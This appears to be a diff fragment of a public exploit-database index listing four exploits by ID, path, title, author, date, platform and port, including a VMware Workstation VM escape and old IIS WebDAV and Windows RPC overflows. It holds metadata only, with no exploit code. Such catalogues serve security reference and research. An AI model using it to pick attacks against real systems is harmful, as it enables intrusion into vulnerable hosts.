+47715,exploits/windows/local/47715.md,"VMware WorkStation 12.5.3 - Virtual Machine Escape",2019-06-06,unamer,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139